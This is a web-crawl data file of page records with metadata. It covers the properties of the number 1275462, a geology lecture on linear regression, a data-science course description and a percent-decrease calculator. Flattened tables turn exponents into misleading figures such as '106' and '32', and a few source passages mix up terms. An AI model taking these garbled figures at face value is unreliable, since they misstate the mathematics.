{"ft_lang_label":"__label__en","ft_lang_prob":0.87567717,"math_prob":0.96168125,"size":1740,"snap":"2021-31-2021-39","text_gpt3_token_len":478,"char_repetition_ratio":0.16186637,"word_repetition_ratio":0.0,"special_character_ratio":0.28965518,"punctuation_ratio":0.1191067,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98665136,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-17T22:06:02Z\",\"WARC-Record-ID\":\"<urn:uuid:a7d300bf-a6b4-413a-bc63-f622b86d4579>\",\"Content-Length\":\"131048\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5e82e9e5-0fb2-4163-9562-61e601dc54c3>\",\"WARC-Concurrent-To\":\"<urn:uuid:db40673e-7d92-4bc8-af16-6adaeccd529d>\",\"WARC-IP-Address\":\"104.200.25.27\",\"WARC-Target-URI\":\"https://www.finance-assignments.com/solutions-2-4410\",\"WARC-Payload-Digest\":\"sha1:GTIDFJIVNSPGTEAHKM3DIZAQELMRVPHK\",\"WARC-Block-Digest\":\"sha1:NPOR44OFCUG3XMTTJVCQWADNG6HK7LNM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780055808.78_warc_CC-MAIN-20210917212307-20210918002307-00397.warc.gz\"}"}
https://metanumbers.com/1275462
[ "# 1275462 (number)\n\n1,275,462 (one million two hundred seventy-five thousand four hundred sixty-two) is an even seven-digits composite number following 1275461 and preceding 1275463. In scientific notation, it is written as 1.275462 × 106. The sum of its digits is 27. It has a total of 5 prime factors and 24 positive divisors. There are 417,600 positive integers (up to 1275462) that are relatively prime to 1275462.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 7\n• Sum of Digits 27\n• Digital Root 9\n\n## Name\n\nShort name 1 million 275 thousand 462 one million two hundred seventy-five thousand four hundred sixty-two\n\n## Notation\n\nScientific notation 1.275462 × 106 1.275462 × 106\n\n## Prime Factorization of 1275462\n\nPrime Factorization 2 × 32 × 59 × 1201\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 4 Total number of distinct prime factors Ω(n) 5 Total number of prime factors rad(n) 425154 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 1,275,462 is 2 × 32 × 59 × 1201. Since it has a total of 5 prime factors, 1,275,462 is a composite number.\n\n## Divisors of 1275462\n\n24 divisors\n\n Even divisors 12 12 6 6\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 24 Total number of the positive divisors of n σ(n) 2.81268e+06 Sum of all the positive divisors of n s(n) 1.53722e+06 Sum of the proper positive divisors of n A(n) 117195 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 1129.36 Returns the nth root of the product of n divisors H(n) 10.8832 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 1,275,462 can be divided by 24 positive divisors (out of which 12 are even, and 12 are odd). The sum of these divisors (counting 1,275,462) is 2,812,680, the average is 117,195.\n\n## Other Arithmetic Functions (n = 1275462)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 417600 Total number of positive integers not greater than n that are coprime to n λ(n) 34800 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 98053 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 417,600 positive integers (less than 1,275,462) that are coprime with 1,275,462. And there are approximately 98,053 prime numbers less than or equal to 1,275,462.\n\n## Divisibility of 1275462\n\n m n mod m 2 3 4 5 6 7 8 9 0 0 2 2 0 6 6 0\n\nThe number 1,275,462 is divisible by 2, 3, 6 and 9.\n\n• Arithmetic\n• Abundant\n\n• Polite\n\n## Base conversion (1275462)\n\nBase System Value\n2 Binary 100110111011001000110\n3 Ternary 2101210121100\n4 Quaternary 10313121012\n5 Quinary 311303322\n6 Senary 43200530\n8 Octal 4673106\n10 Decimal 1275462\n12 Duodecimal 516146\n20 Vigesimal 7j8d2\n36 Base36 rc5i\n\n## Basic calculations (n = 1275462)\n\n### Multiplication\n\nn×y\n n×2 2550924 3826386 5101848 6377310\n\n### Division\n\nn÷y\n n÷2 637731 425154 318866 255092\n\n### Exponentiation\n\nny\n n2 1626803313444 2074925807771911128 2646489020632377311141136 3375496179233813230022695604832\n\n### Nth Root\n\ny√n\n 2√n 1129.36 108.448 33.606 16.6392\n\n## 1275462 as geometric shapes\n\n### Circle\n\n Diameter 2.55092e+06 8.01396e+06 5.11075e+12\n\n### Sphere\n\n Volume 8.69143e+18 2.0443e+13 8.01396e+06\n\n### Square\n\nLength = n\n Perimeter 5.10185e+06 1.6268e+12 1.80378e+06\n\n### Cube\n\nLength = n\n Surface area 9.76082e+12 2.07493e+18 2.20916e+06\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 3.82639e+06 7.04426e+11 1.10458e+06\n\n### Triangular Pyramid\n\nLength = n\n Surface area 2.81771e+12 2.44532e+17 1.04141e+06\n\n## Cryptographic Hash Functions\n\nmd5 9cd39990ca5650265286cf512332dd74 b5938b6098d88483a9d1af5d6ffbc4034a7bc615 ea94a5c6ef0231cd0b8acf8b771b866621b0d1d9540160d1c697a10016c6e71f 7189c33ec2f4cba5573a11f2991953c2912be594d56808c15829db77f801652845b88573ac9bb755a6c9f7278fb7187ca9e02c5d75af5a3d91bc4e803578bc4a 829f2e8a3c0d1f717f79348efc74a8ce0a622191" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6201534,"math_prob":0.9858593,"size":4734,"snap":"2021-43-2021-49","text_gpt3_token_len":1699,"char_repetition_ratio":0.121564485,"word_repetition_ratio":0.039473683,"special_character_ratio":0.47317278,"punctuation_ratio":0.08652657,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99548584,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-22T19:04:21Z\",\"WARC-Record-ID\":\"<urn:uuid:fa9616dc-bd65-43f1-8b8a-bb5b38b43592>\",\"Content-Length\":\"39956\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:45cdacb0-87f0-49f5-9a42-ff7e1e45bd4c>\",\"WARC-Concurrent-To\":\"<urn:uuid:1496bba5-da7d-45c1-b57c-64e877d93fe7>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/1275462\",\"WARC-Payload-Digest\":\"sha1:3R64XR35A6EHDSTXAODX2IMVJBPUQRT4\",\"WARC-Block-Digest\":\"sha1:T7O4XMUX3E42QDAJT54ANT7UZJGELBRV\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585518.54_warc_CC-MAIN-20211022181017-20211022211017-00650.warc.gz\"}"}
http://maps.unomaha.edu/Maher/GEOL2300/week3/week3.html
[ "Week 3: Linear regression - bivariate analysis", null, "Week 3 index:\n\nScatter plot of lightning strike density in Pennsylvania versus elevation with a regression line, with an emphasis on the scatter. What can you tell from the plot? What does the R2 value indicate? A plot with the same axes might look quite different for the Rocky Mountains, a consideration come afternoon time when hiking high. Image source: Digital Mapping Techniques '03 — Workshop Proceedings U.S. Geological Survey Open-File Report 03–471 A Map of Lightning Strike Density for Southeastern Pennsylvania, and Correlation with Terrain Elevation By Alex J. DeCaria and Michael J. Babij - http://pubs.usgs.gov/of/2003/of03-471/decaria/index.html\n\nReading for this week: Chapt 3 in Sandilands, Statistics with Two Variables, p. 148 and on. This is available as a pdf document on Blackboard.\n\nOther sources of information:\n\n• Chapt 6 and 7 in Pagano, P. R., 1994, Understanding Statistics in the Behavioral Sciences (4th ed.), West Publishers, Minneapolis, 496 p. I have found this book very useful. The author isn't afraid to, or to hurried to, use words to provide a conceptual framework for the math, which is a nice switch from other textbooks. Read through this focusing on the concepts and diagrams.\n• Chapt 7 Curve Fitting in Lingme, B. V., 1997, A guide to Microsoft Excel for Scientists and Engineers, John Wiley and Sons., p. 74-83. This section goes through the mechanics of regressions in Excel. You can read this if what is found in the description below is not enough.\n• Hall-Wallace, M. K., 2000, Using Linear Regression to Determine Plate Motions; Journal of Geoscience Education, v. 48, p. 455\n\nScatter plots\n\nLast week we looked at how to describe and analyze one variable. How about two variables that might be related in some way (known as bivariate analysis)? The first step to investigating what the relationship might be between two paired variables is to create a scatter plot, a simple plot of x versus y for the paired variables. What makes an x and y value paired? They could be data collected at the same time and place, or they could be taken from the same specimen, or they could be the previous versus subsequent values in one population. Something unites them, and then questions arise. Is one dependent on the other? Is there some type of mathematical relationship that can be established between the two? What is the strength of that relationship? Initially, one can assess the scatter plot qualitatively, and that helps with subsequent more quantitative analysis. Is there a well defined relationship where the plotted points seem to fall along a line or a curve, or is there a poorly defined or absent relationship that looks like a shotgun blast? Are there clusters? If there is a good linear pattern, is there a negative or positive slope? Is there a fractal pattern (more on that later)? There are good examples of different types of scatter plot patterns in your reading.", null, "Above is an example of a simple scatter plot for measurements taken in the San Fransisco Bay from two cruises on August 20 (red) versus February 23rd (blue) in 2010 and from 1-3 m water depth. What can you conclude from this simple scatter plot? A good starting place is to consider what determines the dissolved oxygen content of surface waters. This graph was constructed at the USGS site: http://sfbay.wr.usgs.gov/cgi-bin/sfbay/dispsys/plotdata4.pl (an interesting array of scatter plots can be constructed giving insight into water quality in the Bay).", null, "Scatter plot of dissolved oxygen versus temperature for the Beaufort River in South Carolina. Why is the relationship between the two so much tighter here than in the plot above? Image source USGS site: http://sofia.usgs.gov/projects/workplans06/hydro_mon.html\n\nThere is a next step in sophistication of analysis where one looks at the relationships between many variables at once (multivariate analysis). Such analysis is beyond the scope of this particular course, but if often learned in a statistics course.\n\nLinear regression and correlation\n\nWhy would you want to regress? Regression, as often practiced in earth sciences, is the attempt to establish a mathematical relationship between two variables. Such a relationsip can be used to extrapolate beyond the range of data/observation, or interpolate between data points, basically to predict one variable given the other. For example, a relationship exists between the frequency of occurrence of a given size flood or earthquake, and the size of the event. Given flood data, and assuming constancy of system operation then one can predict how big a size of a certain frequency will be, i.e. how big the 100 year flood will be. A linear relationship between two variables is captured by the formula y = b + m x , where b is the y intercept and m is the slope. It is significant which variable is y and which is x, as is explained below. The default convention is that x represents the independent variable, and y represents the dependent variable, and that predictions of y are made for a given x value. We won't explicitly deal with curvi-linear regression, although the general approach is similar. It is not uncommon that a non-linear relationship can be transformed into a linear one by a mathematical transformation (very commonly a log transformation).\n\nCorrelation measures the dependability of the relationship (the goodness of fit of the data to the mathematical relationship). It is a measure of how well one variable can predict the other (given the context of the data), and determines the precision you can assign to a relationship.\n\nRegression or correlation can be bivariate (between 2 variables, x and y) or multivariate, between greater than two variables. Regression is interested in the form of the relationship, whereas correlation is more focused simply on the strength of a relationship. In this class we will only deal with classical bivariate linear regression, because it is commonly used and the simplest situation. Just to stress the point through repetition, in all cases the independent variable(s) vs. the dependent variable(s) needs to be clearly defined.", null, "This example shows how linear regression is used to calibrate an instrument.. In this particular case you have the travel time obtained with a Grand Penetrating Radar traverse across river channels as a function of the water depth as measured using weights. In this particular case. given travel time you would like to be able to predict water depth, and this determines which one is x and which one is y. Thus this best-fit line is the calibration line - what is used to turn a traveltime into a water depth. What is the relationship between the amount of scatter and the error you would assign a depth determined by GPR? r2 describes this, and is described more below. Note that the intercept of the line is not zero. Should it be? Image from USGS site: http://sfbay.wr.usgs.gov/cgi-bin/sfbay/dispsys/plotdata4.pl .\n\nIndependent vs. dependent variables and best-fit lines.\n\nA key sin in statistics is to confuse these two, and much shaking of heads and wagging of tongues is directed toward those committing this particular sin. We will see that in many situations it is clear, which is which, but in some cases it is not. The important thing to realize is that which of your two variables you cast into either role does make a difference in the results. The convention (that is built into statistical software packages) is that x is your independent variable and y the dependent variable. But what is the difference?\n\nIn a controlled laboratory situation, the independent variable is the one the experimenter controls, and the dependent is the variable of interest that is measured for different values of the independent variable. If you are looking at the solubility as a function of temperature, temperature would be the independent variable and mass per unit volume of the material dissolved (the solubility) would be the dependent variable. Often there is a stated or unstated assumption that the dependent variable is controlled by the independent one; i.e. that there is a causal (not casual) relation between the two. So temperature changes causes solubility to change. A change in solubility is not thought to cause a change in temperature. Note that you could theoretically use solubility to measure temperature, and so the role of independent vs. dependent could be switched, but what an inefficient way to measure temperature! What is the dependent vs. what is the independent variable is sensitive to the context.\n\nThose used to working in the luxury of a controlled laboratory situation may be forgiven for thinking that there is always a clear cut distinction between dependent vs. independent variables. The real world is more complex. For example, one can investigate whether there is a statistical relationship between Si and K content in a suite of volcanic rocks. Which one is the dependent and which one is the independent variable? Typically Si is taken as the x coordinate, but why? Or perhaps one is looking at the relationship between two different contaminants in an aquifer. This is not a controlled situation. Again, context is the guide. Very often it is helpful to assign the variable you want to predict, or know less about as the dependent variable. For example, if one contaminant was a derivative of the other and an inverse relationship could be expected in any water sample, then the derivative compound would be the dependent variable. If one contaminant was much easier to measure and on the basis of a relationship between the two, was to be used as a proxy indicator or indicator of another then the proxy would be the independent variable. The most important think is to have thought this out before proceeding with the analysis or presenting your results. Establishing a mathematical relationship does not mean you have established a causal relationship.\n\nThe results of a linear regression are often termed the best-fit line. What does this mean? If you imagine a regression line (the plot of a linear equation) and the scatter plot of points that produced it, then imagine the vertical lines (y distance) between each point and the regression line, you have one image of goodness of fit. The smaller those distances the better the fit. Combine those into an aggregate length. This length is a measure of how vertically close the y values are to the regression line. In a perfect fit, there would no difference, with the points plotting right on the line, and the aggregate length would be 0. Different regression lines for the same data produce different aggregate lengths. The statistical routine in Excel and other statistical packages computes the line of minimum deviation, of minimum aggregate length, the one that the points are, in aggregate, closest to.\n\nWhich variable is assigned to x and which to y does make a difference. As an experiment you can put in some real data and run the linear regression both ways (interchange x and y as independent and dependent variables). Why the difference? Simply because in one case you are minimizing the variation for y (the conventional case), and in the other you are minimizing the variation for x.", null, "In a regression of y as the dependent variable, given x, the aggregate values for all the data points of distance A is minimized in the best fit routine. If you reverse the roles of x and y then distance B is minimized instead, and hence you can get a different answer. It is possible to minimize C also.\n\nNatural system feedback loops provide an interesting difficulty because there is not a one way causal relationship. Instead, both variables are interdependent. Snowcover and local air temperature could be one example. Of course, the air temperature determines how much snow melts or doesn't, but also the albedo of the snow affects local air temperature. Try to think of others. What to do in this situation? There is a type of linear regression that instead of seeking to minimize error of line fit only in the y variable, minimizes the error in both x and y. This is described in your Swan and Sandilands reference, and is referred to as structural regression. As you might guess it is more difficult, and we won't treat it here. However, you should look into it when the occasion arises. In any case, in your work you should clearly state which is your independent and which is your dependent variable (has this been stressed enough?). The reader can agree or disagree with your call and take it from there.\n\nIn class exercise: initial exploration of a bivariate relationship.\n\nThis will be a group project. Get into groups of 3.\n\n• Think of some potential relationship between two earth science variables that could be interesting to explore. It could be, for example, between average annual rainfall and sedimentation rate in a lake.\n• For that relationship address the following questions:\n• Why would you expect a relationship, i.e. what is your causal model?\n• Which one should be the independent and which one should be the dependent variable?\n• Where or how might you obtain the needed data?\n• What type of relationship might you expect? In other words, what might be the shape of the scatter plot of the two.\n\nThe more specific you get the better. Report to the class.\n\nThe correlation coefficient.\n\nThe regression equation can be thought of as a mathematical model for a relationship between the two variables. The natural question is how good is the model, how good is the fit. That is where r comes in, the correlation coefficient (technically Pearson's correlation coefficient for linear regression). This basically quantifies how well pairs of x and y positions within their own distributions match each other. If there is a perfect fit, and x explains all the variation in y, then the one distribution as described by the mean and standard deviation of the population of x numbers should suffice for y. In other words if an x value is .65 standard deviation units from the mean, then its y pair should also be .65 standard deviation units from the mean if there is a perfect fit. The basic measure is how much of the variation in y can be explained by the variation in x.\n\nTrying to understand r: One could use the aggregate distance of deviation from the best fit line as described above as a crude measure of goodness of fit. However, the outcome would be a function of the specific scale and units in each individual case, and it would be hard to know how to interpret the resulting number. What is done instead is that each x and y value is scaled against their own distribution, i.e. they are standardized against the distribution of each variable. This is done by computing z score values for each value for both x and y, where z is obtained by subtracting the mean from each value and dividing by the distribution's standard deviation. Basically z values measure the distance from the mean in units of standard deviations. In a perfect fit a y value's position in its distribution will be in the same position as its corresponding x value' position in its distribution - a one to one correspondence. If one plots the z scores for x and y pairs against each other this one to one fit yields a slope of 1. In a good fit the pairs will be close, but not perfect. For low z values of x, where the value is close to or at the mean, the corresponding normalized z value of y likely will be greater because of the deviation in y that is not explained by x. In turn, at the highest z value of x, where x is at its extreme range in the distribution, the z value of the corresponding y is likely to be closer to the y mean, and hence will tend to plot below a one to one position. The result is that the line then has a slope less than one. If there is no relationship then as the z value for x increases, the z value for corresponding y can be higher or lower, resulting in slope of 0. If the position of one variable in its own distribution bears no relationship to that of its companion variable, then a slope of 0 results. r is the slope of the z score values of the two variables plotted against each other. A value of 1 means a perfect fit, and a value of 0 means no relationship exists between the two variables.\n\nWhat it boils down to: r is a measure of goodness of fit. Values close to 1 indicate a very good fit. If you square r it represents the proportion of variability of y accounted for by x. In other words, if you had an r-squared value of .95 you can account for 95% of the variability in y with knowledge of x. In geology r-squared values greater than .9 are preferred, but note that even if you have an r-squared of .33, this means that x is still describing a significant proportion of the y behavior. Those below .5 are considered pretty useless for bivariate analysis, because the associated error is so big. Multivariate analysis is different. Again, if using the mathematical relationship to predict y given x, then the convention is to report an error = 2 x SSE, but this convention is not always followed.\n\nSSE = Standard error of estimate: If you use x to predict y given the relationship you might want to know what are the chances the realy y value is a certain amount away. One commonly sees error reported in association with U-Pb radiometric dates. In part this is where these errors come from, the fitting of a line to isotopic ratio data (known as a chord). There are some implicit assumptions you will need to investigate if the error becomes important to you (i.e. you need to learn a bit more than is presented here). The plus or minus a certain number of million years error reported is usually reported at two SEEs, which means that 95% of the values obtained if this sample were dated over and over again would lie within the noted error range. This is the conventional error reported. For example, an age of 346+/-2 Ma years can then be read that one can be 95% confident that the age is between 344 and 348.\n\nCorrelation vs. cause. We have mentioned this before, but it bears repeating. Imagine a situation where one variable controls or influences two other variables that are independent of each other. For example, temperature controlling algal reproduction and the amount of calcium dissolved in the water of a pond (although the amount of calcium could influence algal reproduction also, and thus they wouldn't be truly independent). A regression of algal concentration versus dissolved sodium could develop a statistically significant relationship, and even a useful, one. However, it would be wrong to conclude that dissolved sodium content was necessarily controlling the biota. This is when you get into multivariate analysis, taking into account the multiple factors that are likely to be related.\n\nProblems with closed correlations occur when working with percent data. This is especially a problem with geochemical or point count data, which are very common in geology. Since the sum of the components must equal one, when plotting one versus the other there must be an inverse relationship, because as one increases in percentage, the other must decrease. This is most easily seen in thinking of a two component system, where there must be a perfect fit with an r = -1. Three or more components will still provide correlations that have nothing to do with true association, or causation. The problem is less severe with trace elements, but can still exist. There are alternate possible relationships in looking for real correlations, but we don't have time to go into those here. Swan and Sandilands do discuss some of the alternate possibilities.\n\nRegression in Excel.\n\nAs usual there are several ways to do a regression, depending on part how much information you want.\n\n• Simple regression in Excel quick and dirty:\n• Insert your data with labels, into your spreadsheet with x and y in two separate columns.\n• Create a scatter plot, making sure you use identify the x and y variables appropriately (see above).\n• For older versions of Excel, with the chart selected, select TRENDLINE under the CHART heading. In the Options page make sure you choose to have Excel return the equation in addition to the r-squared value.\n• For Excel 2007 you use the upper Insert tab and choose the insert scatter plot icon from the array of chart possibilities. Once the chart is created, then you can migrate to the upper Layout tab and then from the Analysis section of choices you can select the Trendline option and follow the instructions. You will need to have the chart selected in order to access these options. Note that if you want the r-squared value to be returned you need to check that option when creating your trendline. The two tabs that allow you to work with your plots/charts are the Layout and Design tabs, and are worth exploring further.\n• U-Tube video on constructing scatter plots and trendline.\n• For piecemeal information the following functions can be used:\n• LINEST (returns the slope and intercept values).\n• SLOPE.\n• INTERCEPT.\n• STEYX (returns the Standard Error for y on x).\n• CORREL (returns bivariate correlation coefficient).\n• For complete statistics and detailed analysis use the REGRESSION under Tools and Data Analysis (the same place you found the histogram making option).\n\nExamples of linear regression.\n\nA similar approach can be taken to estimate recurrence intervals of earthquakes. You will explore this in your exercise.", null, "" ]
[ null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/strikevselevation.jpg", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/O2vsTSanFranBay.gif", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/beaufort.gif", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/calibrationradar.gif", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/xvsy.jpg", null, "http://maps.unomaha.edu/Maher/GEOL2300/week3/scatterth.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94193476,"math_prob":0.9544897,"size":18707,"snap":"2019-13-2019-22","text_gpt3_token_len":3798,"char_repetition_ratio":0.1466075,"word_repetition_ratio":0.005669291,"special_character_ratio":0.19976479,"punctuation_ratio":0.0983835,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99376446,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,1,null,1,null,1,null,2,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-21T09:40:13Z\",\"WARC-Record-ID\":\"<urn:uuid:2872b850-78d4-4cbf-992f-fff76734d342>\",\"Content-Length\":\"29348\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:32354ad4-ddbe-4266-b24f-f8810e718104>\",\"WARC-Concurrent-To\":\"<urn:uuid:b9f606f7-80a7-4167-a113-f5f90bf08125>\",\"WARC-IP-Address\":\"137.48.16.54\",\"WARC-Target-URI\":\"http://maps.unomaha.edu/Maher/GEOL2300/week3/week3.html\",\"WARC-Payload-Digest\":\"sha1:PYUL57UBCJEESRHRZ3TCNL4B66H5JXEH\",\"WARC-Block-Digest\":\"sha1:2FGE273I56QMD47HGGOXSGK4ZJZA74PF\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912202510.47_warc_CC-MAIN-20190321092320-20190321114320-00229.warc.gz\"}"}
https://kurser.ku.dk/course/ndak16003u/2018-2019
[ "# NDAK16003U Introduction to Data Science (IDS)\n\nVolume 2018/2019\nEducation\n\nMSc Programme in IT and Cognition\nMSc Programme in Bioinformatics\nMSc Programme in Molecular Biomedicine\n\nContent\n\nThe amount and complexity of available data is steadily increasing. To make use of this wealth of information, computing systems are needed that turn data into knowledge. Machine learning is about developing the required software that automatically analyses data for making predictions, categorizations, and recommendations. Machine learning algorithms are already an integral part of today's computing systems - for example in search engines, recommender systems, or biometrical applications. Machine learning provides a set of tools that is widely applicable for data analysis within a diverse set of problem domains such as data mining, search engines, digital image and signal analysis, natural language modeling, bioinformatics, physics, economics, biology, etc.\n\nThe purpose of the course is to introduce non-Computer Science students to probabilistic data modeling and the most common techniques from statistical machine learning and data mining. The students will obtain a working knowledge of basic data modeling and data analysis using fundamantal machine learning techniques.\n\nThis course is relevant for students from, among others, the studies of Cognition and IT, Bioinformatics, Physics, Biology, Chemistry, Economics, and Psychology.\n\nThe course covers the following tentative topic list:\n\n• Foundations of statistical learning, probability theory.\n• Classification methods, such as: Linear models, K-Nearest Neighbor.\n• Regression methods, such as: Linear regression.\n• Clustering.\n• Dimensionality reduction and visualization techniques such as principal component analysis (PCA).\nLearning Outcome\n\nAt course completion, the successful student will have:\n\nKnowledge of\n\n• the general principles of data analysis;\n• elementary probability theory for modeling and analyzing data;\n• the basic concepts underlying classification, regression, and clustering;\n• common pitfalls in machine learning.\n\nSkills in\n\n• applying linear and non-linear techniques for classification and regression;\n• elementary data clustering;\n• visualizing and evaluating results obtained with machine learning techniques;\n• identifying and handling common pitfalls in machine learning;\n• using machine learning and data mining toolboxes.\n\nCompetences in\n\n• recognizing and describing possible applications of machine learning and data analysis in their field of science;\n• comparing, appraising and selecting machine learning methods for specific tasks;\n• solving real-world data mining and pattern recognition problems by using machine learning techniques.\n\nSee Absalon when the course is set up.\n\nVery basic calculus and programming knowledge is required.\nLecture and exercise classes\nThe courses NDAK16003U Introduction to Data Science (IDS) and NDAB15001U Modelling and Analysis of Data (MAD) have a very substantial overlap both in topics and level, and it is therefore not recommended that students pass both these courses.\n• Category\n• Hours\n• Lectures\n• 28\n• Practical exercises\n• 74\n• Preparation\n• 30\n• Theory exercises\n• 74\n• Total\n• 206\nCredit\n7,5 ECTS\nType of assessment\nContinuous assessment\nAssessment of 6-8 assignments weighted equally. Passed assignments cannot be transferred to another block.\nAid\nAll aids allowed\nMarking scale" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8213435,"math_prob":0.54859644,"size":3951,"snap":"2019-51-2020-05","text_gpt3_token_len":843,"char_repetition_ratio":0.11933114,"word_repetition_ratio":0.0034662045,"special_character_ratio":0.20197418,"punctuation_ratio":0.11980033,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96508986,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-29T16:03:08Z\",\"WARC-Record-ID\":\"<urn:uuid:334bdc82-3402-4bfb-9dc4-e14a10c628bb>\",\"Content-Length\":\"37771\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f45edcf8-7197-4516-a74b-5af3cac98776>\",\"WARC-Concurrent-To\":\"<urn:uuid:73336808-1c64-485c-9ddd-1b5a61c7e1cd>\",\"WARC-IP-Address\":\"130.225.88.227\",\"WARC-Target-URI\":\"https://kurser.ku.dk/course/ndak16003u/2018-2019\",\"WARC-Payload-Digest\":\"sha1:F3IFKGBDQRBUL27PIGRTKY7ZFTGVZI5R\",\"WARC-Block-Digest\":\"sha1:JSM5SXTO3VLVKPCXBBT4653E6M4FNQHI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251799918.97_warc_CC-MAIN-20200129133601-20200129163601-00368.warc.gz\"}"}
https://whatpercentcalculator.com/what-is-percent-decrease-from-105-to-95
[ "# What is the percent decrease from 105 to 95?\n\n## (Percent decrease from 105 to 95 is 9.52381 percent)\n\n### Percent decrease from 105 to 95 is 9.52381 percent! Explanation: What does 9.52381 percent or 9.52381% mean?\n\nPercent (%) is an abbreviation for the Latin “per centum”, which means per hundred or for every hundred. So, 9.52381% means 9.52381 out of every 100. For example, if you decrease 105 by 9.52381% then it will become 95.\n\n### Methods to calculate \"What is the percent decrease from 105 to 95\" with step by step explanation:\n\n#### Method: Use the Percent Decrease Calculator formula (Old Number - New Number/Old Number)*100 to calculate \"What is the percent decrease from 105 to 95\".\n\n1. From the New Number deduct Old Number i.e. 105-95 = 10\n2. Divide above number by Old Number i.e. 10/105 = 0.0952381\n3. Multiply the result by 100 i.e. 0.0952381*100 = 9.52381%\n\n### 105 Percentage example\n\nPercentages express a proportionate part of a total. When a total is not given then it is assumed to be 100. E.g. 105% (read as 105 percent) can also be expressed as 105/100 or 105:100.\n\nExample: If you earn 105% (105 percent) profit then on an investment of \\$100 you receive a profit of \\$105.\n\nAt times you need to calculate a tip in a restaurant, or how to split money between friends in your head, that is without any calculator or pen and paper.\nMany a time, it is quite easy if you break it down to smaller chunks. You should know how to find 1%, 10% and 50%. After that finding percentages becomes pretty easy.\n• To find 5%, find 10% and divide it by two\n• To find 11%, find 10%, then find 1%, then add both values\n• To find 15%, find 10%, then add 5%\n• To find 20%, find 10% and double it\n• To find 25%, find 50% and then halve it\n• To find 26%, find 25% as above, then find 1%, and then add these two values\n• To find 60%, find 50% and add 10%\n• To find 75%, find 50% and add 25%\n• To find 95%, find 5% and then deduct it from the number\nIf you know how to find these easy percentages, you can add, deduct and calculate percentages easily, specially if they are whole numbers. At least you should be able to find an approximate.\n\n### Scholarship programs to learn math\n\nHere are some of the top scholarships available to students who wish to learn math.\n\n### Examples to calculate \"What is the percent decrease from X to Y?\"\n\nWhatPercentCalculator.com is a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for sites to earn advertising fees by advertising and linking to Amazon.com." ]
[ null ]
